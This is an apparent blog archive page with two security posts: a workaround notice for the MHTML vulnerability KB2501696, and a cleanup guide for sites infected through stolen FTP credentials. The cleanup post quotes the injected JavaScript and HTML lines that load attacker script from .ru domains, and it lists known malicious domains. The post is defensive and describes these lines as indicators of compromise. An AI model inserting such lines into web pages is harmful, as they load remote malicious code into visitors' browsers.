Archive

Archive for the ‘Malware’ Category

Microsoft KB2501696 MHTML Vulnerability Test and Quick Fix Workaround – Group Policy Friendly

January 31st, 2011 5 comments

All Microsoft platforms since Windows XP SP3 are affected with this pretty nasty vulnerability. Referencing KB2501696 shows that this bug is caused by the way Windows handles MHTML documents. Internet Explorer is not the one at fault here, this is a Windows bug, however IE will be the attack vector for anyone wanting to take advantage of this flaw (and they will).

First off, to see if you are affected, follow this test link using Internet Explorer. If you get a popup box saying you are affected, then you should apply this fix right away. Also, make sure you are using Internet Explorer since most other browsers do not use the Windows MHTML libraries.

Microsoft gives a lame “FixIt” MSI that is not very GPO friendly. So I went out and wrote my own fix for it. It’s a batch script that you can run locally on a single computer or deploy as a “startup/shutdown script” in Group Policy without any edits needed. It is also compatible with x86 and x64 bit machines. Copy the following into your favorite text editor and give it a “.cmd” extension.

You can also click here to download it. Comment below and let me know how this works for you or if you have any other questions/comments/improvements!

Thanks!

Categories: How To, Malware, MHTML, Security, Vulnerability Tags:

Getting pocketbloke.ru, inkrainbow.ru, pantsletter.ru JavaScript and PHP malware code injection hacks/infection? Get the fix here!

August 17th, 2010 124 comments

I have put together a PHP script to automatically remove all traces of this malicious code from your website. All you have to do is upload the script to the root of your web directory then access the page with any browser. I’ve built in many features including folder and file recursion, file extension filtering, automatic file backups, and two modes of operation:  search only and search and fix.

Click here to see the .RU Removal Script in action! (demo)

or…

Click here for the .RU Removal Script Source Code

or here for it on PasteBin

Let me know in the comments if it works for you or if you have any feature requests!

Thanks to everyone commenting below, we have found out that malware on your PC is stealing your FTP credentials to websites you have access to. They have an automatic script that will login to your site using FTP and append a link to PHP and JS files containing their malicious code.

It looks like this in JavaScript files:

document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/
Template.js"></scri'+'pt>');

PHP or HTML files contain the following at the end:

<script type="text/javascript" src="http://inkrainbow.ru/Template.js"></script>
<!--3848d52fcd665b3d7d96c22e5b6a5451-->

Here is a short list of some domain names that we’ve come across…

Known Malicious Domains:

  • pocketbloke.ru
  • inkrainbow.ru
  • pantsletter.ru
  • fightkid.ru
  • shirtdifficulty.ru
  • casechick.ru
  • obscurewax.ru
  • nuttypiano.com
  • Many others… (comment domains you find below)

STEPS TO TAKE TO REMOVE THE THREAT:

  1. Run MalwareBytes and get rid of anything on your machine
  2. Uninstall your FTP client
  3. Change your FTP passwords
  4. Update JAVA – According to this CERT KB
  5. Remove all traces of the scripts from your domains

UPDATE (8/26/2010): Now more than just .RU are involved which means the script in its current state won’t detect it. Working on a new way to detect this issue. Any ideas? Comment below.

Categories: Malware, PHP, Randomness, Security Tags: